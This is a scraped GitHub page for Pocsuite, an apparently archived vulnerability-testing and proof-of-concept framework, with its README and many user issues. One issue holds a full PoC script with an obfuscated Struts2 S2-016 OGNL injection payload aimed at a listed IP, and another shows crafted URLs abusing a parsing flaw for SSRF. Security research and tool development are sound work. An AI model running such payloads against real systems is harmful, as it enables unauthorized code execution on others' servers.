knownsec / pocsuite Goto Github PK

View Code? Open in Web Editor NEW

1.8K 154.0 608.0 11.86 MB

This project has stopped to maintenance, please to https://github.com/knownsec/pocsuite3 project.

Home Page: http://pocsuite.org

Python 100.00%

pocsuite's Introduction

This project has stopped to maintenance, please to https://github.com/knownsec/pocsuite3 project.

Pocsuite

Overview

Pocsuite is an open-sourced remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team. It comes with a powerful proof-of-concept engine, many niche features for the ultimate penetration testers and security researchers.

How to use

Pocsuite with seebug PoC search and zoomeye dork

Pocsuite with seebug PoC and zoomeye dork

Pocsuite with zoomeye API

Pocsuite with seebug PoC API online

Requirements

Python 2.6+
Works on Linux, Windows, Mac OSX, BSD

Installation

The quick way:

$ pip install pocsuite

Or click here to download the latest source zip package and extract

$ wget https://github.com/knownsec/Pocsuite/archive/master.zip
$ unzip master.zip

The latest version of this software is available from: http://pocsuite.org

Documentation

Documentation is available in the english docs / chinese docs directory.

How to Contribute

Check for open issues or open a fresh issue to start a discussion around a feature idea or a bug.
Fork the repository on GitHub to start making your changes to the dev branch (or branch off of it).
Write a test which shows that the bug was fixed or that the feature works as expected.
Send a pull request and bug the maintainer until it gets merged and published. Make sure to add yourself to THANKS.

pocsuite's People

Contributors

Stargazers

Watchers

Forkers

linpengstc liaoran lynch1981 hksuki fooying retanoj jiangzhw thelongestusernameofall yut0u verdureorange liusec akun baiyunping333 llych mtfly evannn kakakacool q1f3 davidwang24 lendo roewe ttxx9999 shengxinking tutorial0 focustouch roomy-zju lucabongiorni jaonlin lixuejiang gaohuijian junyue arschlochnop avaudioplayer lingkeyang wenr0u drone789 gurdzain aylhex sunyi00 sdgdsffdsfff zhuyue1314 blueroutecn edwardwu99 terrychan9527 evilning sigma-random zhongyiin wxdublin gamehacker thurday javarike winsday nersle returnhere hengqujushi beefcrack sfilyh shark2016 exiahan zhaodelong key20 majl adra1n tduncle chinalover neotalk joeyxy cracker8090 zhangymjlu demetriusyoung coca1ne jmpews pocute stop1992 chensword myluke tuhaolam notxmg mengbo beelives jianjian0dandan dipsec b1gw00d twb725 kingmarket haply xbzbing handlemail hotydjer odin1314 kugouming xi4mi taibaiyifeng tengfei1010 chikuanghacker hellokuku fengxuangit a11riseforme pysec ccavxx

pocsuite's Issues

调用cannon API 返回结果字段不够详细

https://github.com/knownsec/Pocsuite/blob/master/docs/INTEGRATE.md#poc-成功失败异常信息

手册中调用cannon api返回的poc字段不够详细,没有返回poc的 desc、vulType、references字段。

你好，如何进行post请求

你好，我测试了好久，看官方文档也是说req就是跟requests模块一样，但是我测试poc时，get可以，req.get，但是req.post就不行，希望能够指导下，下面奉上完整的poc：

`#!/usr/bin/env python

coding: utf-8

import re
import urlparse
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
vulID = '' # ssvid
version = '1'
author = ['']
vulDate = ''
createDate = ''
updateDate = ''
references = ['']
name = '5clib_str2-016'
appPowerLink = 'http://www.wooyun.org/bugs/wooyun-2010-0128686'
appName = '5clib'
appVersion = ''
vulType = 'str2-016'
desc = '''
5clib_str2-016
'''
samples = ['http://58.119.33.50:8081/']

def _attack(self):

     return self._verify()

def _verify(self):
    result = {}
    vulurl = urlparse.urljoin(self.url, '/5clib/property.action')
    payload = "?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path88888887:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
    resp = req.get(vulurl + payload)
    if resp.status_code == 200 and '88888887' in resp.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vulurl
        result['VerifyInfo']['Payload'] = payload

    return self.parse_attack(result)

def parse_attack(self, result):
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet nothing returned')
    return output

PoC 支持 pyc

-r ***.pyc

有的漏洞需要ftp服务器

OS / Software Version

Please copy uname -a result here
Pocsuite version here

How to reproduce the issue ?

pocsuite/lib/utils/webshell.py WebShell 基类 Bug

def set_pwd(self, pwd):
     self._password = pwd

缺少一行，用以更新 check 请求时传递的参数数据：

def set_pwd(self, pwd):
    self._password = pwd
    self._check_data[self._password] = self._check_statement  # 缺少该行

批量运行 PoC 功能完善

cookie初始化问题

options.py
def _setHTTPCookies():
"""
Set the HTTP Cookie header
"""

if conf.cookie:
    debugMsg = "setting the HTTP Cookie header"
    logger.debug(debugMsg)

    conf.httpHeaders[HTTP_HEADER.COOKIE] = conf.cookie

修改为
def _setHTTPCookies():
"""
Set the HTTP Cookie header
"""

if conf.cookie:
    debugMsg = "setting the HTTP Cookie header"
    logger.debug(debugMsg)

    conf.httpHeaders[HTTP_HEADER.COOKIE] = conf.cookie
else:
    conf.httpHeaders[HTTP_HEADER.COOKIE] = None

不然写poc self.header['Cookie'] 必须要用上
try...except...

url2ip解析可能导致ssrf

pocsuite/lib/utils/funs.py

def url2ip(url):
    """
    works like turning 'http://baidu.com' => '180.149.132.47'
    """
    iport = urlsplit(url)[1].split(':')
    if len(iport) > 1:
        return gethostbyname(iport[0]), iport[1]
    return gethostbyname(iport[0])

http://localhost:[email protected]/

这个文件的url2ip函数在为url解析ip地址的时候可能因为:号分割处理不当解析到其他IP造成ssrf。

标准的URL格式:

协议://用户名:密码@子域名.域名.顶级域名:端口号/目录/文件名.文件后缀?参数=值#标志

如果传递如下url给该函数:

"http://localhost:[email protected]/"

最后将返回:

('127.0.0.1', '[email protected]')

任意IP地址解析:

http://0x08080808:www.baidu.com/
http://0x08080808:[email protected]/

('8.8.8.8', 'www.baidu.com')
 ('8.8.8.8', '[email protected]')

可能有问题的插件写法

from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.api.utils import url2ip

class TestPOC(POCBase):
    name = "url2iptest"
    vulID = 'test'
    author = ['']
    vulType = 'test'
    version = '1.0' 
    references = ''
    desc = ''

    vulDate = ''
    createDate = ''
    updateDate = ''

    appName = ''
    appVersion = ''
    appPowerLink = ''
    samples = []

    def _attack(self):
        return self._verify()

    def _verify(self):
        address=url2ip(self.url)
        result={}
        result['ipinfo']={}
        result['ipinfo']['address']=address
        return self.parse_output(result)
        
    
    def parse_output(self,result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

希望尽快出个安全靠谱的解析方案。。。

Error

`pocsuite --url https://www.mysite.com/ --vul-keyword 'magento' --verify --report ./report.html

                          ,--. ,--.

,---. ,---. ,---.,---.,--.,----,-' '-.,---. {2.0.6-nongit-20170922} | .-. | .-. | .--( .-'| || ,--'-. .-| .-. : | '-' ' '-' \ --.-' ' '' | | | | \ --. | |-' ---' -------' ----'--' --' ----'
`--' http://pocsuite.org

[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.

[*] starting at 15:46:36

No JSON object could be decoded
Traceback (most recent call last):
File "/Library/Python/2.7/site-packages/pocsuite/pocsuite_cli.py", line 157, in pcsInit
if not s.newToken():
File "/Library/Python/2.7/site-packages/pocsuite/api/x.py", line 107, in newToken
content = json.loads(req.content)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/init.py", line 338, in loads
return _default_decoder.decode(s)
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/decoder.py", line 366, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/decoder.py", line 384, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
`

批量扫描中途暂停功能，停止功能添加

保存扫描进度
中途停止后报表显示
扫描结束后输出成功数量，失败数量,优化输出

拼写错误

https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
”为了防止误报产生以及避免被关键词被WAF等作为检测特征,要求验证结果判断的时候输出随机的字符串（可以调用API中的randoStr方法）“中的“randoStr”应为“randomStr”。

ZoomEye API 功能问题

我在验证solr未授权访问漏洞时，使用网页版搜索solr country:cn得到结果正常，有160+

使用--dork "solr" 正常
使用--dork "country:cn"正常
使用--dork "solr country:cn"无结果

查了下官方的API说明，并未发现这种功能。是我的姿势不对吗？

还有我看了下API的源码，返回只有IP，但是在实际PoC时端口也是非常重要的，是否考虑增加几行代码实现返回IP+端口

def search(self, dork, page=1, resource='web'):
        req = requests.get(
            'https://api.zoomeye.org/{}/search?query="{}"&page={}&facet=app,os'.format(resource, urllib.quote(dork),
                                                                                       page + 1),
            headers=self.headers
        )
        content = json.loads(req.content)
        if 'matches' in content:
            anslist = []
            for match in content['matches']:
                ans = match['ip']
                if match.has_key('portinfo'):
                    ans += ':' + str(match['portinfo']['port'])
                anslist.append(ans)
            return anslist
        else:
            return []

pcs-console.py - OSError: [Errno 2] No such file or directory: '/opt/Pocsuite/pocsuite/modules'

We clone code from respository, and run pocsuite console. Some error message as follow:

┌─[lab@core]─[/opt/Pocsuite/pocsuite]
└──╼ python pcs-console.py 
Traceback (most recent call last):
  File "pcs-console.py", line 28, in <module>
    initializePoc(folders)
  File "/opt/Pocsuite/pocsuite/lib/core/consoles.py", line 50, in initializePoc
    files = os.listdir(folder)
OSError: [Errno 2] No such file or directory: '/opt/Pocsuite/pocsuite/modules

Please create modules directory , or solve the issue in another way.

os.system("clear")

If running in a Win OS env, "clear" will make no sense. cls should be a better idea.

requests 默认支持301/302跳转，但是JS跳转就没办法

类似比如这种JS跳转，get无法跟踪，可以patch requests

>>> url = r'http://m.baidu.com/from=1012585f/bd_page_type=1/ssid=15567761646568656174327407/uid=0/pu=usm%402%2Csz%401320_2001%2Cta%40iphone_1_3.0_3_528/baiduid=F8CF1C9B13A69F341A9A38C3718410D8/w=10_10_%E9%B1%BC%E8%82%9D%E6%B2%B9%E7%9A%84%E5%8A%9F%E6%95%88%E4%B8%8E%E4%BD%9C%E7%94%A8/t=iphone/l=1/tc?ref=www_iphone&lid=16538771669423618855&order=4&waplogo=1&fm=wnor&dict=-1&tj=www_zhidao_normal_4_10_10_title&sec=8644&di=312580a852c21860&bdenc=1&nsrc=IlPT2AEptyoA_yixCFOxXnANedT62v3IDBqMMS6LLDivpEmixP4kHREsRC0aNWiCGkb8gTCcshYFuX3b_71l8hRArKtosWka6SWhuKC'
>>> import requests
>>> res = requests.head(url)
>>> res.headers['Location']
'http://zhidao.baidu.com/question/390970477767010205.html'

请问是否支持那些需要用户名和口令登录的web应用？

该框架是否只支持基于http的poc，是否能够利用该框架编写非HTTP的POC呢？

粗略的看了一下文档有一些疑问，请问这个框架是只支持http的poc编写么？如果我想编写非http的poc是否需要自己重新编写一个poc类？

readme.md里python拼写错误

如标题

CHANGELOG.md

http://pocsuite.org/ 相关链接
Change Log
https://github.com/knownsec/Pocsuite/blob/master/docs/CHANGLOG.md

Issues:
https://github.com/knownsec/Pocsuite/blob/master/docs/CHANGELOG.md

如何给"Extra-Params"的参数设置一个默认缺省值?

我编写POC时遇到一个问题, 假设一个脚本是用来检测admin_index.php文件是否存在的, 这个文件默认在admin目录下, 但如果用户更改了默认目录名的话, 脚本也需要相应的改变以确保正确执行, 而我不希望每次检测时都要手动去修改poc, 而是才用extra-params的方式覆盖变量默认值, 所以我在脚本内使用了:
self.params["variable"]的方式来获取用户传入, 并加了判断如果该值不存在就覆盖一个默认值过去

但是遇到了一个问题: 当用户没有传入该值时, 该poc不会执行
不知道是哪里的问题

OS / Software Version

Please copy uname -a result here
Pocsuite version here

How to reproduce the issue ?

集成pocsuite时报错：pocsuite.lib.core.exception.PocsuiteDataException: unable to access item 'registeredPocs'

按照官方文档加TestPOC(直接用的规范里的测试：https://github.com/knownsec/Pocsuite/blob/ee7c7da71e374d853eb9c8816ba3dbf9261683ed/docs/CODING.md#poc-%E7%BC%96%E5%86%99%E8%A7%84%E8%8C%83%E5%8F%8A%E8%A6%81%E6%B1%82%E8%AF%B4%E6%98%8E)以及test.py；
这两个py在同一目录下；
test.py:
`# -- coding: utf-8 --

import pocsuite
from pocsuite.api.cannon import Cannon
from pocsuite.api.poc import register
import TestPOC

info={"pocname": "TestPOC",
"pocstring": u"sf",
"mode": "verify( or attack)"
}

target="test.site"
invoker=Cannon(target,info)

resulet=invoker.run()`

执行时报错如下：
Traceback (most recent call last): File "/root/xunfeng/aider/test.py", line 8, in <module> import TestPOC File "/root/xunfeng/aider/TestPOC.py", line 91, in <module> register(TestPOC) File "/home/project/sometest/venv/local/lib/python2.7/site-packages/pocsuite/lib/core/register.py", line 22, in registerPoc if module in kb.registeredPocs: File "/home/project/sometest/venv/local/lib/python2.7/site-packages/pocsuite/lib/core/datatype.py", line 46, in __getattr__ raise PocsuiteDataException("unable to access item '%s'" % item) pocsuite.lib.core.exception.PocsuiteDataException: unable to access item 'registeredPocs'

查看源码后，估计是kb中没有registeredPocs；在TestPOC.py中加入
初始 kb["registeredPocs"] = {}
这次就ok了
`TestPOC
[18:11:29] [-] ('Connection aborted.', gaierror(-2, 'Name or service not known'))
('test.site', 'TestPOC', '1571', 'Drupal', '7.x', (3.0, ConnectionError(ProtocolError('Connection aborted.', gaierror(-2, 'Name or service not known')),)), '2017-07-05 18:11:29', '{}')

Process finished with exit code 0`

但这样就是每次只能执行一个，总感觉是不是姿势不对，
求指教

超时异常处理出错

site-packages/pocsuite/lib/controller/controller.py", line 95, in pocThreads

Error: 'TestPOC' object has no attribute 'result'

Pocsuite> help

Core Commands Menu (help <command> for details)
===============================================
attack          Attack mode, sends exploit payload
back            Move back from the current Interpreter
banner          Display an awesome framework banner
debug           Enter into python debug mode
exit            Exit the current interpre
help            Show help menu
pocadd          Load available poc(s) from a directory or a file
pocdel          Unload specific poc file(s)
poclist         Show all available pocs / task pocs
seebug          Download pocs from seebug with API Token
set             Set key equal to value
show            Show available options / modules
verify          Verify Mode, checks if a vuln exists or not

Pocsuite> pocadd /tmp/dp.py
Pocsuite> poclist

   IMPORTED-ID POC-PATH
   =========== ========
             1 /tmp/dp.py


   POC--STATUS POC-PATH
   =========== ========
            ok dp.py

Pocsuite> set url http://192.168.1.100
Pocsuite> attack
[01:14:58] [*] setting the HTTP timeout
[01:14:58] [*] checking dp
[01:14:58] [*] poc:'dp' target:'http://192.168.1.100'
http://192.168.1.100/index.php/system/temporary/?file=config.tar.gz
[01:15:03] [-] 'TestPOC' object has no attribute 'result'
[01:15:03] [-] poc-12345 'Joomla com_jotloader - Full Path Disclosure Vulnerability' failed.
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
|      target-url      | poc-name | poc-id | component | version |                       status                      |
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
| http://192.168.1.100 |    dp    | 12345  |   Joomla  |  2.2.1  | Error: 'TestPOC' object has no attribute 'result' |
+----------------------+----------+--------+-----------+---------+---------------------------------------------------+
success : 0 / 1

现在master分支暂停迭代, 新更新都在dev分支里

第一天打开Pocsuite.拼写错误。。Pyhton应该是Python

OS / Software Version

Please copy uname -a result here
Pocsuite version here

How to reproduce the issue ?

add pocsuite console feature

Try to add a powerful and interactive console,

$ ./pcs-console.py ./modules

                              ,--. ,--.
 ,---. ,---. ,---.,---.,--.,--`--,-'  '-.,---.  {2.0.4.1-782b2aa}
| .-. | .-. | .--(  .-'|  ||  ,--'-.  .-| .-. :
| '-' ' '-' \ `--.-'  `'  ''  |  | |  | \   --.
|  |-' `---' `---`----' `----'`--' `--'  `----'
`--'                                            http://pocsuite.org

Pocsuite> help

Core Commands Menu (help <command> for details)
===============================================
attack          conduncting attack
back            Move back from the current context
banner          Display an awesome framework banner
help            Show help menu
load            load specific poc file(s).
set             Set key equal to value
show            Show available options / modules
verify          conducting verification

Pocsuite> show pocs
{1: './modules/apache_struts_s2_033.py',
 2: './modules/dlink_command_php_exec_noauth.py'}
Pocsuite> load 2
[*] load poc file(s) success!
Pocsuite> set url http://www.baidu.com/
Pocsuite> attack
[07:18:53] [*] setting the HTTP timeout
[07:18:53] [*] checking dlink_command_php_exec_noauth
[07:18:53] [!] missing ['appPowerLink'] in dlink_command_php_exec_noauth
[07:18:53] [*] poc:'dlink_command_php_exec_noauth' target:'http://www.baidu.com/'
[07:18:54] [-] poc-78176 'Multiple Vulnerabilities in D-Link DIR-600 and DIR-300' failed.
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
|       target-url      |            poc-name           | poc-id | component |     version      |  status  |
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
| http://www.baidu.com/ | dlink_command_php_exec_noauth | 78176  |   D-Link  | DIR-300, DIR-600 | Error: n |
+-----------------------+-------------------------------+--------+-----------+------------------+----------+
success : 0 / 1

--extra-parms 时 username和'username'

pcs-console - OSError: [Errno 2] No such file or directory

If a pocsuite newbie,

$ ./pcs-console.py -h
Traceback (most recent call last):
  File "./pcs-console.py", line 15, in <module>
    sys.exit(main())
  File "/Users/Open-Security/Code/ks-pocsuite/pocsuite/pocsuite_console.py", line 27, in main
    initializePoc(folders)
  File "/Users/Open-Security/Code/ks-pocsuite/pocsuite/lib/core/consoles.py", line 53, in initializePoc
    files = os.listdir(folder)
OSError: [Errno 2] No such file or directory: '-h'

cannon.py - unable to access item 'retry'

[11:15:19] [-] unable to access item 'retry'
[- 09/18/16 11:15:19,018][cannon.py:71] >> unable to access item 'retry'

add english documents for pocsuite

需要个英文版的帮助文档

没有-u的时候没有有好提示, 在程序中间报错而不是开头

pocsuite 框架是否考虑一下自定义参数接口

例如 PoC 正常运行需要提供额外的数据，如应用密钥(authkey)等等，因为在渗透或者扫描中，每个站点的密钥值不相同，需要外部传入才能保证 PoC 的整体处理流程正确性。

ZoomEye API issue

Hi.

Thank you for making a good tool.

I ZoomEye API error occurs.

What is the solution?

Check the following logs.

root@kali-Odin:~# pocsuite --dork 'port:6379' --max-page 3 --vul-keyword redis --verify

[!] legal disclaimer: Usage of pocsuite for attacking targets without prior mutual consent is illegal.

[*] starting at 05:55:29

[05:55:34] [+] ZoomEye API authorization failed,Please input ZoomEye Email and Password for use ZoomEye API!
ZoomEye Email:[email protected]
ZoomEye Password:password123

[06:01:08] [-] ZoomEye API authorization failed, make sure correct credentials provided in "~/.pocsuiterc".

Thanks.

pcs-console verify error

use the python pcs-console.py enter the command line, when input verify, i faced this error:

raceback (most recent call last):
File "pcs-console.py", line 15, in
sys.exit(main())
File "/home/niu/Pocsuite/pocsuite/pocsuite_console.py", line 25, in main
pcs.shell_will_go()
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 102, in shell_will_go
self.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 244, in do_verify
self.exploit()
File "/home/niu/Pocsuite/pocsuite/lib/core/consoles.py", line 171, in exploit
setMultipleTarget()
File "/home/niu/Pocsuite/pocsuite/lib/core/option.py", line 219, in setMultipleTarget
if conf.url.endswith('/24'):
AttributeError: 'NoneType' object has no attribute 'endswith'

最近这个版本的问题太多了，zoomeye不稳定，pocsuite 用不了zoomeye seebug接口
错误如下：
No JSON object could be decoded
Traceback (most recent call last):
File "/usr/local/lib/python2.7/dist-packages/pocsuite-2.0.6-py2.7.egg/pocsuite/pocsuite_cli.py", line 83, in pcsInit
if z.newToken():
File "/usr/local/lib/python2.7/dist-packages/pocsuite-2.0.6-py2.7.egg/pocsuite/api/x.py", line 40, in newToken
content = json.loads(req.content)
File "/usr/lib/python2.7/json/init.py", line 339, in loads
return _default_decoder.decode(s)
File "/usr/lib/python2.7/json/decoder.py", line 364, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "/usr/lib/python2.7/json/decoder.py", line 382, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded

compatible-with-old 合并

两个小问题

第一个是有关“--random-agent”的。在使用这个参数后，生成的User-Agent的形式便会如下: ['Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.0 Safari/532.0']，即多了一组中括号和引号；

第二个是有关“-u”参数的。对于经由“-u”传入的地址，如开头不是“http://”或“https://”，便会在开头添加“http://”，而没有考虑到例如“ftp://”等协议，在使用上造成了一些不便。

lib中有些代码没有被外面引用到

如题，比如：revision.py， convert.py

fix links in English README

Please fix links in English README - Usage Part, ex:

How to use Pocsuite to test vulnerability
How to develop PoC/Exp based on Pocsuite
How to integrate Pocsuite in applications

Those links are invalid.

duplicate function versioncheck

Once is enough.

pocsuite.py
from pocsuite.lib.utils import versioncheck
pcs-attack.py
from pocsuite.lib.utils import versioncheck
pcs-console.py
from pocsuite.lib.utils import versioncheck
pcs-verify.py
from pocsuite.lib.utils import versioncheck
pocsuite/pocsuite_cli.py
from .lib.utils import versioncheck

Is it necessary to put third-party modules in the [thirdparty direcroty]

Is it necessary to put third-party modules in the thirdparty direcroty?

Benefit：

It's so simple to use Pocsuite. Download and extract the source code.
For beginners, it is easy to get started.

Disadvantage：

Modules may use python libraries which are not installed by Pocsuite.
Hard to provide cross-platform support
Performance is limited. ex: gevent VS thread

讨论下关于第三方模块引用的问题

是否有必要编译封装第三方模块在「thirdparty」目录

好处：

直接下载源码就可以使用Pocsuite，而不需要安装，简单易用
对于新手来说比较容易上手

坏处：

编译封装的第三方模块在不同平台可能会出现问题
类似于gevent等只能（不同平台下的编译不同）通过pip install 安装的第三方模块就没法使用，于是Pocsuite就没法使用协程来提供性能

看起来似乎是否可以维护两个分支？

一个是当前代码版本，能提供基本的调用功能即可，主要面向于新手，一些不会安装的用户。

一个新版本，采用协程提高性能，通过Makefile 等方式让使用者以安装的形式安装Pocsuite及依赖的模块，这个版本为以后主要开发版本

调用cannon API 尝试集成pocsuite的时候遇到错误

我使用了以下代码调用 cannon API ：

#!/usr/bin/python
# coding:utf-8

from pocsuite.api.cannon import Cannon
info = {"pocname": "modules\dlink_command_php_exec_noauth.py", #应该是py文件名
        "pocstring": "dlink_command_php_exec_noauth.py",
        "mode": "verify"
        }
target = "www.baidu.com"
invoker = Cannon(target, info) # 生成用来引用 Pocsuite 的实例
result = invoker.run() # 调用 Pocsuite, result 保存了 Pocsuite 执行的返回结果
print result

遇到的错误如下：

Traceback (most recent call last):
dlink_command_php_exec_noauth.py
  File "D:/BitTorrentSync/Python_Code/scoutproject/scout/callpocsuite.py", line 9, in <module>
    invoker = Cannon(target, info) # 生成用来引用 Pocsuite 的实例
<code object <module> at 025185C0, file "dlink_command_php_exec_noauth.py", line 1>
  File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\api\cannon.py", line 45, in __init__
    self.registerPoc()
  File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\api\cannon.py", line 62, in registerPoc
    importer.load_module(self.moduleName)
  File "C:\Python27\lib\site-packages\pocsuite-2.0.4.1-py2.7.egg\pocsuite\lib\core\common.py", line 60, in load_module
    exec code in mod.__dict__   #exec语句将字符串str当成有效Python代码来执行 ,in后边的内容是指定该语句的全局和局部命名空间。
  File "dlink_command_php_exec_noauth.py", line 1, in <module>
NameError: name 'dlink_command_php_exec_noauth' is not defined

无法载入POC ，新手求教

Pcs.poc> load 1
unable to access item 'isPocString'
`

程序版本为最新版 1.2.6
求解答原因～

ZoomEye API URL编码问题

建议在Search的字符串这里加一个URL encode

flake8 fails to work as it used to be on python 2.6.9

https://travis-ci.org/knownsec/Pocsuite/jobs/160780949
https://gitlab.com/pycqa/flake8/issues/187

Using worker: worker-linux-docker-53caf344.prod.travis-ci.org:travis-linux-16
system_info
Build system information
Build language: python
Build group: stable
Build dist: precise
Build id: 160780948
Job id: 160780949
travis-build version: ef82e8245
Build image provisioning date and time
Thu Feb  5 15:09:33 UTC 2015
Operating System Details
Distributor ID: Ubuntu
Description:    Ubuntu 12.04.5 LTS
Release:    12.04
Codename:   precise
Linux Version
3.13.0-29-generic
Cookbooks Version
a68419e https://github.com/travis-ci/travis-cookbooks/tree/a68419e
GCC version
gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
Copyright (C) 2011 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
LLVM version
clang version 3.4 (tags/RELEASE_34/final)
Target: x86_64-unknown-linux-gnu
Thread model: posix
Pre-installed Ruby versions
ruby-1.9.3-p551
Pre-installed Node.js versions
v0.10.36
Pre-installed Go versions
1.4.1
Redis version
redis-server 2.8.19
riak version
2.0.2
MongoDB version
MongoDB 2.4.12
CouchDB version
couchdb 1.6.1
Neo4j version
1.9.4
RabbitMQ Version
3.4.3
ElasticSearch version
1.4.0
Installed Sphinx versions
2.0.10
2.1.9
2.2.6
Default Sphinx version
2.2.6
Installed Firefox version
firefox 31.0esr
PhantomJS version
1.9.8
ant -version
Apache Ant(TM) version 1.8.2 compiled on December 3 2011
mvn -version
Apache Maven 3.2.5 (12a6b3acb947671f09b81f49094c53f426d8cea1; 2014-12-14T17:29:23+00:00)
Maven home: /usr/local/maven
Java version: 1.7.0_76, vendor: Oracle Corporation
Java home: /usr/lib/jvm/java-7-oracle/jre
Default locale: en_US, platform encoding: ANSI_X3.4-1968
OS name: "linux", version: "3.13.0-29-generic", arch: "amd64", family: "unix"
fix.CVE-2015-7547
$ export DEBIAN_FRONTEND=noninteractive
W: Size of file /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise-backports_multiverse_source_Sources.gz is not what the server reported 5886 5888
W: Size of file /var/lib/apt/lists/ppa.launchpad.net_ubuntugis_ppa_ubuntu_dists_precise_main_binary-amd64_Packages.gz is not what the server reported 33653 36677
W: Size of file /var/lib/apt/lists/ppa.launchpad.net_ubuntugis_ppa_ubuntu_dists_precise_main_binary-i386_Packages.gz is not what the server reported 33699 36733
Reading package lists...
Building dependency tree...
Reading state information...
The following extra packages will be installed:
  libc-bin libc-dev-bin libc6-dev
Suggested packages:
  glibc-doc
The following packages will be upgraded:
  libc-bin libc-dev-bin libc6 libc6-dev
4 upgraded, 0 newly installed, 0 to remove and 245 not upgraded.
Need to get 8,840 kB of archives.
After this operation, 14.3 kB disk space will be freed.
Get:1 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main libc6-dev amd64 2.15-0ubuntu10.15 [2,943 kB]
Get:2 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main libc-dev-bin amd64 2.15-0ubuntu10.15 [84.7 kB]
Get:3 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main libc-bin amd64 2.15-0ubuntu10.15 [1,177 kB]
Get:4 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main libc6 amd64 2.15-0ubuntu10.15 [4,636 kB]
Fetched 8,840 kB in 0s (25.6 MB/s)
Preconfiguring packages ...
(Reading database ... 72431 files and directories currently installed.)
Preparing to replace libc6-dev 2.15-0ubuntu10.10 (using .../libc6-dev_2.15-0ubuntu10.15_amd64.deb) ...
Unpacking replacement libc6-dev ...
Preparing to replace libc-dev-bin 2.15-0ubuntu10.10 (using .../libc-dev-bin_2.15-0ubuntu10.15_amd64.deb) ...
Unpacking replacement libc-dev-bin ...
Preparing to replace libc-bin 2.15-0ubuntu10.10 (using .../libc-bin_2.15-0ubuntu10.15_amd64.deb) ...
Unpacking replacement libc-bin ...
Processing triggers for man-db ...
Setting up libc-bin (2.15-0ubuntu10.15) ...
(Reading database ... 72430 files and directories currently installed.)
Preparing to replace libc6 2.15-0ubuntu10.10 (using .../libc6_2.15-0ubuntu10.15_amd64.deb) ...
Unpacking replacement libc6 ...
Setting up libc6 (2.15-0ubuntu10.15) ...
Setting up libc-dev-bin (2.15-0ubuntu10.15) ...
Setting up libc6-dev (2.15-0ubuntu10.15) ...
Processing triggers for libc-bin ...
ldconfig deferred processing now taking place
git.checkout
0.66s$ git clone --depth=50 https://github.com/knownsec/Pocsuite.git knownsec/Pocsuite
Cloning into 'knownsec/Pocsuite'...
remote: Counting objects: 1226, done.
remote: Compressing objects: 100% (524/524), done.
remote: Total 1226 (delta 778), reused 1081 (delta 692), pack-reused 0
Receiving objects: 100% (1226/1226), 1.67 MiB | 0 bytes/s, done.
Resolving deltas: 100% (778/778), done.
Checking connectivity... done.
$ cd knownsec/Pocsuite
0.37s$ git fetch origin +refs/pull/113/merge:
remote: Counting objects: 10, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 10 (delta 8), reused 9 (delta 8), pack-reused 0
Unpacking objects: 100% (10/10), done.
From https://github.com/knownsec/Pocsuite
 * branch            refs/pull/113/merge -> FETCH_HEAD
$ git checkout -qf FETCH_HEAD
This job is running on container-based infrastructure, which does not allow use of 'sudo', setuid and setguid executables.
If you require sudo, add 'sudo: required' to your .travis.yml
See https://docs.travis-ci.com/user/workers/container-based-infrastructure/ for details.
0.01s$ source ~/virtualenv/python2.6/bin/activate
$ python --version
Python 2.6.9
$ pip --version
pip 6.0.7 from /home/travis/virtualenv/python2.6.9/lib/python2.6/site-packages (python 2.6)
install.1
2.51s$ pip install flake8
Collecting flake8
  Downloading flake8-3.0.4-py2.py3-none-any.whl (64kB)
    100% |################################| 65kB 2.3MB/s 
Collecting pyflakes!=1.2.0,!=1.2.1,!=1.2.2,<1.3.0,>=0.8.1 (from flake8)
